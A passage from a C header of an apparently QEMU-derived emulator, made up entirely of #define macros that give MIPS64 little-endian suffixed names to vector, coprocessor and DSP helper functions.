helper_gvec_dup16 helper_gvec_dup16_mips64el #define helper_gvec_dup8 helper_gvec_dup8_mips64el #define helper_gvec_not helper_gvec_not_mips64el #define helper_gvec_and helper_gvec_and_mips64el #define helper_gvec_or helper_gvec_or_mips64el #define helper_gvec_xor helper_gvec_xor_mips64el #define helper_gvec_andc helper_gvec_andc_mips64el #define helper_gvec_orc helper_gvec_orc_mips64el #define helper_gvec_nand helper_gvec_nand_mips64el #define helper_gvec_nor helper_gvec_nor_mips64el #define helper_gvec_eqv helper_gvec_eqv_mips64el #define helper_gvec_ands helper_gvec_ands_mips64el #define helper_gvec_xors helper_gvec_xors_mips64el #define helper_gvec_ors helper_gvec_ors_mips64el #define helper_gvec_shl8i helper_gvec_shl8i_mips64el #define helper_gvec_shl16i helper_gvec_shl16i_mips64el #define helper_gvec_shl32i helper_gvec_shl32i_mips64el #define helper_gvec_shl64i helper_gvec_shl64i_mips64el #define helper_gvec_shr8i helper_gvec_shr8i_mips64el #define helper_gvec_shr16i helper_gvec_shr16i_mips64el #define helper_gvec_shr32i helper_gvec_shr32i_mips64el #define helper_gvec_shr64i helper_gvec_shr64i_mips64el #define helper_gvec_sar8i helper_gvec_sar8i_mips64el #define helper_gvec_sar16i helper_gvec_sar16i_mips64el #define helper_gvec_sar32i helper_gvec_sar32i_mips64el #define helper_gvec_sar64i helper_gvec_sar64i_mips64el #define helper_gvec_shl8v helper_gvec_shl8v_mips64el #define helper_gvec_shl16v helper_gvec_shl16v_mips64el #define helper_gvec_shl32v helper_gvec_shl32v_mips64el #define helper_gvec_shl64v helper_gvec_shl64v_mips64el #define helper_gvec_shr8v helper_gvec_shr8v_mips64el #define helper_gvec_shr16v helper_gvec_shr16v_mips64el #define helper_gvec_shr32v helper_gvec_shr32v_mips64el #define helper_gvec_shr64v helper_gvec_shr64v_mips64el #define helper_gvec_sar8v helper_gvec_sar8v_mips64el #define helper_gvec_sar16v helper_gvec_sar16v_mips64el #define helper_gvec_sar32v helper_gvec_sar32v_mips64el #define helper_gvec_sar64v helper_gvec_sar64v_mips64el #define helper_gvec_eq8 helper_gvec_eq8_mips64el #define helper_gvec_ne8 helper_gvec_ne8_mips64el #define helper_gvec_lt8 helper_gvec_lt8_mips64el #define helper_gvec_le8 helper_gvec_le8_mips64el #define helper_gvec_ltu8 helper_gvec_ltu8_mips64el #define helper_gvec_leu8 helper_gvec_leu8_mips64el #define helper_gvec_eq16 helper_gvec_eq16_mips64el #define helper_gvec_ne16 helper_gvec_ne16_mips64el #define helper_gvec_lt16 helper_gvec_lt16_mips64el #define helper_gvec_le16 helper_gvec_le16_mips64el #define helper_gvec_ltu16 helper_gvec_ltu16_mips64el #define helper_gvec_leu16 helper_gvec_leu16_mips64el #define helper_gvec_eq32 helper_gvec_eq32_mips64el #define helper_gvec_ne32 helper_gvec_ne32_mips64el #define helper_gvec_lt32 helper_gvec_lt32_mips64el #define helper_gvec_le32 helper_gvec_le32_mips64el #define helper_gvec_ltu32 helper_gvec_ltu32_mips64el #define helper_gvec_leu32 helper_gvec_leu32_mips64el #define helper_gvec_eq64 helper_gvec_eq64_mips64el #define helper_gvec_ne64 helper_gvec_ne64_mips64el #define helper_gvec_lt64 helper_gvec_lt64_mips64el #define helper_gvec_le64 helper_gvec_le64_mips64el #define helper_gvec_ltu64 helper_gvec_ltu64_mips64el #define helper_gvec_leu64 helper_gvec_leu64_mips64el #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips64el #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips64el #define helper_gvec_ssadd32 helper_gvec_ssadd32_mips64el #define helper_gvec_ssadd64 helper_gvec_ssadd64_mips64el #define helper_gvec_sssub8 helper_gvec_sssub8_mips64el #define helper_gvec_sssub16 helper_gvec_sssub16_mips64el #define helper_gvec_sssub32 helper_gvec_sssub32_mips64el #define helper_gvec_sssub64 helper_gvec_sssub64_mips64el #define helper_gvec_usadd8 helper_gvec_usadd8_mips64el #define helper_gvec_usadd16 helper_gvec_usadd16_mips64el #define helper_gvec_usadd32 helper_gvec_usadd32_mips64el #define helper_gvec_usadd64 helper_gvec_usadd64_mips64el #define helper_gvec_ussub8 helper_gvec_ussub8_mips64el #define helper_gvec_ussub16 helper_gvec_ussub16_mips64el #define helper_gvec_ussub32 helper_gvec_ussub32_mips64el #define helper_gvec_ussub64 helper_gvec_ussub64_mips64el #define helper_gvec_smin8 helper_gvec_smin8_mips64el #define helper_gvec_smin16 helper_gvec_smin16_mips64el #define helper_gvec_smin32 helper_gvec_smin32_mips64el #define helper_gvec_smin64 helper_gvec_smin64_mips64el #define helper_gvec_smax8 helper_gvec_smax8_mips64el #define helper_gvec_smax16 helper_gvec_smax16_mips64el #define helper_gvec_smax32 helper_gvec_smax32_mips64el #define helper_gvec_smax64 helper_gvec_smax64_mips64el #define helper_gvec_umin8 helper_gvec_umin8_mips64el #define helper_gvec_umin16 helper_gvec_umin16_mips64el #define helper_gvec_umin32 helper_gvec_umin32_mips64el #define helper_gvec_umin64 helper_gvec_umin64_mips64el #define helper_gvec_umax8 helper_gvec_umax8_mips64el #define helper_gvec_umax16 helper_gvec_umax16_mips64el #define helper_gvec_umax32 helper_gvec_umax32_mips64el #define helper_gvec_umax64 helper_gvec_umax64_mips64el #define helper_gvec_bitsel helper_gvec_bitsel_mips64el #define cpu_restore_state cpu_restore_state_mips64el #define page_collection_lock page_collection_lock_mips64el #define page_collection_unlock page_collection_unlock_mips64el #define free_code_gen_buffer free_code_gen_buffer_mips64el #define tcg_exec_init tcg_exec_init_mips64el #define tb_cleanup tb_cleanup_mips64el #define tb_flush tb_flush_mips64el #define tb_phys_invalidate tb_phys_invalidate_mips64el #define tb_gen_code tb_gen_code_mips64el #define tb_exec_lock tb_exec_lock_mips64el #define tb_exec_unlock tb_exec_unlock_mips64el #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64el #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64el #define tb_check_watchpoint tb_check_watchpoint_mips64el #define cpu_io_recompile cpu_io_recompile_mips64el #define tb_flush_jmp_cache tb_flush_jmp_cache_mips64el #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips64el #define translator_loop_temp_check translator_loop_temp_check_mips64el #define translator_loop translator_loop_mips64el #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips64el #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips64el #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips64el #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips64el #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips64el #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips64el #define unassigned_mem_ops unassigned_mem_ops_mips64el #define floatx80_infinity floatx80_infinity_mips64el #define dup_const_func dup_const_func_mips64el #define gen_helper_raise_exception gen_helper_raise_exception_mips64el #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips64el #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64el #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64el #define gen_helper_cpsr_read gen_helper_cpsr_read_mips64el #define gen_helper_cpsr_write gen_helper_cpsr_write_mips64el #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips64el #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64el #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64el #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64el #define helper_mfc0_random helper_mfc0_random_mips64el #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64el #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64el #define helper_mfc0_tcbind helper_mfc0_tcbind_mips64el #define helper_mftc0_tcbind helper_mftc0_tcbind_mips64el #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64el #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64el #define helper_mfc0_tchalt helper_mfc0_tchalt_mips64el #define helper_mftc0_tchalt helper_mftc0_tchalt_mips64el #define helper_mfc0_tccontext helper_mfc0_tccontext_mips64el #define helper_mftc0_tccontext helper_mftc0_tccontext_mips64el #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64el #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64el #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64el #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64el #define helper_mfc0_count helper_mfc0_count_mips64el #define helper_mfc0_saar helper_mfc0_saar_mips64el #define helper_mfhc0_saar helper_mfhc0_saar_mips64el #define helper_mftc0_entryhi helper_mftc0_entryhi_mips64el #define helper_mftc0_cause helper_mftc0_cause_mips64el #define helper_mftc0_status helper_mftc0_status_mips64el #define helper_mfc0_lladdr helper_mfc0_lladdr_mips64el #define helper_mfc0_maar helper_mfc0_maar_mips64el #define helper_mfhc0_maar helper_mfhc0_maar_mips64el #define helper_mfc0_watchlo helper_mfc0_watchlo_mips64el #define helper_mfc0_watchhi helper_mfc0_watchhi_mips64el #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips64el #define helper_mfc0_debug helper_mfc0_debug_mips64el #define helper_mftc0_debug helper_mftc0_debug_mips64el #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64el #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64el #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64el #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64el #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64el #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64el #define helper_dmfc0_maar helper_dmfc0_maar_mips64el #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64el #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips64el #define helper_dmfc0_saar helper_dmfc0_saar_mips64el #define helper_mtc0_index helper_mtc0_index_mips64el #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64el #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64el #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64el #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64el #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64el #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64el #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64el #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64el #define helper_mtc0_yqmask helper_mtc0_yqmask_mips64el #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64el #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64el #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64el #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64el #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64el #define helper_mtc0_tcbind helper_mtc0_tcbind_mips64el #define helper_mttc0_tcbind helper_mttc0_tcbind_mips64el #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64el #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64el #define helper_mtc0_tchalt helper_mtc0_tchalt_mips64el #define helper_mttc0_tchalt helper_mttc0_tchalt_mips64el #define helper_mtc0_tccontext helper_mtc0_tccontext_mips64el #define helper_mttc0_tccontext helper_mttc0_tccontext_mips64el #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64el #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64el #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64el #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64el #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64el #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64el #define helper_mtc0_context helper_mtc0_context_mips64el #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips64el #define update_pagemask update_pagemask_mips64el #define helper_mtc0_pagemask helper_mtc0_pagemask_mips64el #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64el #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips64el #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips64el #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips64el #define helper_mtc0_pwfield helper_mtc0_pwfield_mips64el #define helper_mtc0_pwsize helper_mtc0_pwsize_mips64el #define helper_mtc0_wired helper_mtc0_wired_mips64el #define helper_mtc0_pwctl helper_mtc0_pwctl_mips64el #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64el #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64el #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64el #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64el #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64el #define helper_mtc0_hwrena helper_mtc0_hwrena_mips64el #define helper_mtc0_count helper_mtc0_count_mips64el #define helper_mtc0_saari helper_mtc0_saari_mips64el #define helper_mtc0_saar helper_mtc0_saar_mips64el #define helper_mthc0_saar helper_mthc0_saar_mips64el #define helper_mtc0_entryhi helper_mtc0_entryhi_mips64el #define helper_mttc0_entryhi helper_mttc0_entryhi_mips64el #define helper_mtc0_compare helper_mtc0_compare_mips64el #define helper_mtc0_status helper_mtc0_status_mips64el #define helper_mttc0_status helper_mttc0_status_mips64el #define helper_mtc0_intctl helper_mtc0_intctl_mips64el #define helper_mtc0_srsctl helper_mtc0_srsctl_mips64el #define helper_mtc0_cause helper_mtc0_cause_mips64el #define helper_mttc0_cause helper_mttc0_cause_mips64el #define helper_mftc0_epc helper_mftc0_epc_mips64el #define helper_mftc0_ebase helper_mftc0_ebase_mips64el #define helper_mtc0_ebase helper_mtc0_ebase_mips64el #define helper_mttc0_ebase helper_mttc0_ebase_mips64el #define helper_mftc0_configx helper_mftc0_configx_mips64el #define helper_mtc0_config0 helper_mtc0_config0_mips64el #define helper_mtc0_config2 helper_mtc0_config2_mips64el #define helper_mtc0_config3 helper_mtc0_config3_mips64el #define helper_mtc0_config4 helper_mtc0_config4_mips64el #define helper_mtc0_config5 helper_mtc0_config5_mips64el #define helper_mtc0_lladdr helper_mtc0_lladdr_mips64el #define helper_mtc0_maar helper_mtc0_maar_mips64el #define helper_mthc0_maar helper_mthc0_maar_mips64el #define helper_mtc0_maari helper_mtc0_maari_mips64el #define helper_mtc0_watchlo helper_mtc0_watchlo_mips64el #define helper_mtc0_watchhi helper_mtc0_watchhi_mips64el #define helper_mthc0_watchhi helper_mthc0_watchhi_mips64el #define helper_mtc0_xcontext helper_mtc0_xcontext_mips64el #define helper_mtc0_framemask helper_mtc0_framemask_mips64el #define helper_mtc0_debug helper_mtc0_debug_mips64el #define helper_mttc0_debug helper_mttc0_debug_mips64el #define helper_mtc0_performance0 helper_mtc0_performance0_mips64el #define helper_mtc0_errctl helper_mtc0_errctl_mips64el #define helper_mtc0_taglo helper_mtc0_taglo_mips64el #define helper_mtc0_datalo helper_mtc0_datalo_mips64el #define helper_mtc0_taghi helper_mtc0_taghi_mips64el #define helper_mtc0_datahi helper_mtc0_datahi_mips64el #define helper_mftgpr helper_mftgpr_mips64el #define helper_mftlo helper_mftlo_mips64el #define helper_mfthi helper_mfthi_mips64el #define helper_mftacx helper_mftacx_mips64el #define helper_mftdsp helper_mftdsp_mips64el #define helper_mttgpr helper_mttgpr_mips64el #define helper_mttlo helper_mttlo_mips64el #define helper_mtthi helper_mtthi_mips64el #define helper_mttacx helper_mttacx_mips64el #define helper_mttdsp helper_mttdsp_mips64el #define helper_dmt helper_dmt_mips64el #define helper_emt helper_emt_mips64el #define helper_dvpe helper_dvpe_mips64el #define helper_evpe helper_evpe_mips64el #define helper_dvp helper_dvp_mips64el #define helper_evp helper_evp_mips64el #define cpu_mips_get_random cpu_mips_get_random_mips64el #define cpu_mips_init cpu_mips_init_mips64el #define helper_absq_s_ph helper_absq_s_ph_mips64el #define helper_absq_s_qb helper_absq_s_qb_mips64el #define helper_absq_s_w helper_absq_s_w_mips64el #define helper_absq_s_ob helper_absq_s_ob_mips64el #define helper_absq_s_qh helper_absq_s_qh_mips64el #define helper_absq_s_pw helper_absq_s_pw_mips64el #define helper_addqh_ph helper_addqh_ph_mips64el #define helper_addqh_r_ph helper_addqh_r_ph_mips64el #define helper_addqh_r_w helper_addqh_r_w_mips64el #define helper_addqh_w helper_addqh_w_mips64el #define helper_adduh_qb helper_adduh_qb_mips64el #define helper_adduh_r_qb helper_adduh_r_qb_mips64el #define helper_subqh_ph helper_subqh_ph_mips64el #define helper_subqh_r_ph helper_subqh_r_ph_mips64el #define helper_subqh_r_w helper_subqh_r_w_mips64el #define helper_subqh_w helper_subqh_w_mips64el #define helper_addq_ph helper_addq_ph_mips64el #define helper_addq_s_ph helper_addq_s_ph_mips64el #define helper_addq_s_w helper_addq_s_w_mips64el #define helper_addu_ph helper_addu_ph_mips64el #define helper_addu_qb helper_addu_qb_mips64el #define helper_addu_s_ph helper_addu_s_ph_mips64el #define helper_addu_s_qb helper_addu_s_qb_mips64el #define helper_subq_ph helper_subq_ph_mips64el #define helper_subq_s_ph helper_subq_s_ph_mips64el #define helper_subq_s_w helper_subq_s_w_mips64el #define helper_subu_ph helper_subu_ph_mips64el #define helper_subu_qb helper_subu_qb_mips64el #define helper_subu_s_ph helper_subu_s_ph_mips64el #define helper_subu_s_qb helper_subu_s_qb_mips64el #define helper_adduh_ob helper_adduh_ob_mips64el #define helper_adduh_r_ob helper_adduh_r_ob_mips64el #define helper_subuh_ob helper_subuh_ob_mips64el #define helper_subuh_r_ob helper_subuh_r_ob_mips64el #define helper_addq_pw helper_addq_pw_mips64el #define helper_addq_qh helper_addq_qh_mips64el #define helper_addq_s_pw helper_addq_s_pw_mips64el #define helper_addq_s_qh helper_addq_s_qh_mips64el #define helper_addu_ob helper_addu_ob_mips64el #define helper_addu_qh helper_addu_qh_mips64el #define helper_addu_s_ob helper_addu_s_ob_mips64el #define helper_addu_s_qh helper_addu_s_qh_mips64el #define helper_subq_pw helper_subq_pw_mips64el #define helper_subq_qh helper_subq_qh_mips64el #define helper_subq_s_pw helper_subq_s_pw_mips64el #define helper_subq_s_qh helper_subq_s_qh_mips64el #define helper_subu_ob helper_subu_ob_mips64el #define helper_subu_qh helper_subu_qh_mips64el #define helper_subu_s_ob helper_subu_s_ob_mips64el #define helper_subu_s_qh helper_subu_s_qh_mips64el #define helper_subuh_qb helper_subuh_qb_mips64el #define helper_subuh_r_qb helper_subuh_r_qb_mips64el #define helper_addsc helper_addsc_mips64el #define helper_addwc helper_addwc_mips64el #define helper_modsub helper_modsub_mips64el #define helper_raddu_w_qb helper_raddu_w_qb_mips64el #define helper_raddu_l_ob helper_raddu_l_ob_mips64el #define helper_precr_qb_ph helper_precr_qb_ph_mips64el #define helper_precrq_qb_ph helper_precrq_qb_ph_mips64el #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64el #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64el #define helper_precrq_ph_w helper_precrq_ph_w_mips64el #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64el #define helper_precr_ob_qh helper_precr_ob_qh_mips64el #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64el #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64el #define helper_precrq_ob_qh helper_precrq_ob_qh_mips64el #define helper_precrq_qh_pw helper_precrq_qh_pw_mips64el #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64el #define helper_precrq_pw_l helper_precrq_pw_l_mips64el #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64el #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64el #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64el #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64el #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64el #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64el #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64el #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64el #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64el #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64el #define helper_precequ_qh_obl helper_precequ_qh_obl_mips64el #define helper_precequ_qh_obr helper_precequ_qh_obr_mips64el #define helper_precequ_qh_obla helper_precequ_qh_obla_mips64el #define helper_precequ_qh_obra helper_precequ_qh_obra_mips64el #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64el #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64el #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64el #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64el #define helper_preceu_qh_obl helper_preceu_qh_obl_mips64el #define helper_preceu_qh_obr helper_preceu_qh_obr_mips64el #define helper_preceu_qh_obla helper_preceu_qh_obla_mips64el #define helper_preceu_qh_obra helper_preceu_qh_obra_mips64el #define helper_shll_qb helper_shll_qb_mips64el #define helper_shrl_qb helper_shrl_qb_mips64el #define helper_shra_qb helper_shra_qb_mips64el #define helper_shra_r_qb helper_shra_r_qb_mips64el #define helper_shll_ob helper_shll_ob_mips64el #define helper_shrl_ob helper_shrl_ob_mips64el #define helper_shra_ob helper_shra_ob_mips64el #define helper_shra_r_ob helper_shra_r_ob_mips64el #define helper_shll_ph helper_shll_ph_mips64el #define helper_shll_s_ph helper_shll_s_ph_mips64el #define helper_shll_qh helper_shll_qh_mips64el #define helper_shll_s_qh helper_shll_s_qh_mips64el #define helper_shrl_qh helper_shrl_qh_mips64el #define helper_shra_qh helper_shra_qh_mips64el #define helper_shra_r_qh helper_shra_r_qh_mips64el #define helper_shll_s_w helper_shll_s_w_mips64el #define helper_shra_r_w helper_shra_r_w_mips64el #define helper_shll_pw helper_shll_pw_mips64el #define helper_shll_s_pw helper_shll_s_pw_mips64el #define helper_shra_pw helper_shra_pw_mips64el #define helper_shra_r_pw helper_shra_r_pw_mips64el #define helper_shrl_ph helper_shrl_ph_mips64el #define helper_shra_ph helper_shra_ph_mips64el #define helper_shra_r_ph helper_shra_r_ph_mips64el #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64el #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64el #define helper_mulq_rs_ph helper_mulq_rs_ph_mips64el #define helper_mul_ph helper_mul_ph_mips64el #define helper_mul_s_ph helper_mul_s_ph_mips64el #define helper_mulq_s_ph helper_mulq_s_ph_mips64el #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64el #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64el #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64el #define helper_mulsa_w_ph helper_mulsa_w_ph_mips64el #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64el #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64el #define helper_mulq_rs_qh helper_mulq_rs_qh_mips64el #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64el #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64el #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64el #define helper_dpau_h_qbl helper_dpau_h_qbl_mips64el #define helper_dpau_h_qbr helper_dpau_h_qbr_mips64el #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64el #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64el #define helper_dpau_h_obl helper_dpau_h_obl_mips64el #define helper_dpau_h_obr helper_dpau_h_obr_mips64el #define helper_dpsu_h_obl helper_dpsu_h_obl_mips64el #define helper_dpsu_h_obr helper_dpsu_h_obr_mips64el #define helper_dpa_w_ph helper_dpa_w_ph_mips64el #define helper_dpax_w_ph helper_dpax_w_ph_mips64el #define helper_dps_w_ph helper_dps_w_ph_mips64el #define helper_dpsx_w_ph helper_dpsx_w_ph_mips64el #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64el #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64el #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64el #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64el #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64el #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64el #define helper_dpa_w_qh helper_dpa_w_qh_mips64el #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64el #define helper_dps_w_qh helper_dps_w_qh_mips64el #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64el #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64el #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64el #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64el #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64el #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64el #define helper_maq_s_w_phl helper_maq_s_w_phl_mips64el #define helper_maq_s_w_phr helper_maq_s_w_phr_mips64el #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64el #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64el #define helper_mulq_s_w helper_mulq_s_w_mips64el #define helper_mulq_rs_w helper_mulq_rs_w_mips64el #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64el #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64el #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64el #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64el #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64el #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64el #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64el #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64el #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64el #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64el #define helper_dmadd helper_dmadd_mips64el #define helper_dmaddu helper_dmaddu_mips64el #define helper_dmsub helper_dmsub_mips64el #define helper_dmsubu helper_dmsubu_mips64el #define helper_bitrev helper_bitrev_mips64el #define helper_insv helper_insv_mips64el #define helper_dinsv helper_dinsv_mips64el #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64el #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64el #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64el #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64el #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64el #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64el #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64el #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64el #define helper_cmpu_le_qb helper_cmpu_le_qb_mips64el #define helper_cmp_eq_ph helper_cmp_eq_ph_mips64el #define helper_cmp_lt_ph helper_cmp_lt_ph_mips64el #define helper_cmp_le_ph helper_cmp_le_ph_mips64el #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64el #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64el #define helper_cmpu_le_ob helper_cmpu_le_ob_mips64el #define helper_cmp_eq_qh helper_cmp_eq_qh_mips64el #define helper_cmp_lt_qh helper_cmp_lt_qh_mips64el #define helper_cmp_le_qh helper_cmp_le_qh_mips64el #define helper_cmp_eq_pw helper_cmp_eq_pw_mips64el #define helper_cmp_lt_pw helper_cmp_lt_pw_mips64el #define helper_cmp_le_pw helper_cmp_le_pw_mips64el #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64el #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64el #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64el #define helper_pick_qb helper_pick_qb_mips64el #define helper_pick_ph helper_pick_ph_mips64el #define helper_pick_ob helper_pick_ob_mips64el #define helper_pick_qh helper_pick_qh_mips64el #define helper_pick_pw helper_pick_pw_mips64el #define helper_packrl_ph helper_packrl_ph_mips64el #define helper_packrl_pw helper_packrl_pw_mips64el #define helper_extr_w helper_extr_w_mips64el #define helper_extr_r_w helper_extr_r_w_mips64el #define helper_extr_rs_w helper_extr_rs_w_mips64el #define helper_dextr_w helper_dextr_w_mips64el #define helper_dextr_r_w helper_dextr_r_w_mips64el #define helper_dextr_rs_w helper_dextr_rs_w_mips64el #define helper_dextr_l helper_dextr_l_mips64el #define helper_dextr_r_l helper_dextr_r_l_mips64el #define helper_dextr_rs_l helper_dextr_rs_l_mips64el #define helper_extr_s_h helper_extr_s_h_mips64el #define helper_dextr_s_h helper_dextr_s_h_mips64el #define helper_extp helper_extp_mips64el #define helper_extpdp helper_extpdp_mips64el #define helper_dextp helper_dextp_mips64el #define helper_dextpdp helper_dextpdp_mips64el #define helper_shilo helper_shilo_mips64el #define helper_dshilo helper_dshilo_mips64el #define helper_mthlip helper_mthlip_mips64el #define helper_dmthlip helper_dmthlip_mips64el #define cpu_wrdsp cpu_wrdsp_mips64el #define helper_wrdsp helper_wrdsp_mips64el #define cpu_rddsp cpu_rddsp_mips64el #define helper_rddsp helper_rddsp_mips64el #define helper_cfc1 helper_cfc1_mips64el #define helper_ctc1 helper_ctc1_mips64el #define ieee_ex_to_mips ieee_ex_to_mips_mips64el #define helper_float_sqrt_d helper_float_sqrt_d_mips64el #define 